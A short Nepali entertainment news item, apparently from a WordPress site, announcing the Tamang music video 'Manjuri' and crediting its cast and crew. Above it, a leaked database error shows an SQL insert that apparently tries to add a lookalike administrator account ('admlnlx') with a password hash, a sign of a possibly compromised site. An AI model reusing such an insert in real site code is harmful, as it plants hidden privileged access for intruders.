WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKqk5rwQHqqA07dUIMQ9xdS4ZJGmDP1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 14:47:36', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । तामाङ चलचित्र जगतका महानायक अमिर दोङ र मोडल दिपा घिसिङ अभिनित ‘मञ्जुरी’ बोलको गीत बजारमा आएको छ । डम्फु मिडियाको अफिसियल युटुब च्यानलबाट उक्त गीत सार्वजानिक गरिएको हो ।
गीतलाई स्वंय दोङले निर्देशन र सम्पादन गरेका हुन । गीतमा चर्चित गायक एंव संगीतकार बिशाल काल्तानको शब्द र संगीत, चर्चित
गायिका जितु लोप्चन र सन्तोष गोलेको आवाज रहेको छ । गीतलाई दिपेश प्रधानले मिक्सिङ र संगीत संयोजन गरेका हुन ।
भिडियोलाई ड्रोन, छायांकन र कलर गरेका हुन भने हेरुका लामा र युद्ध लामाले कोरियोग्राफी गरेका हुन ।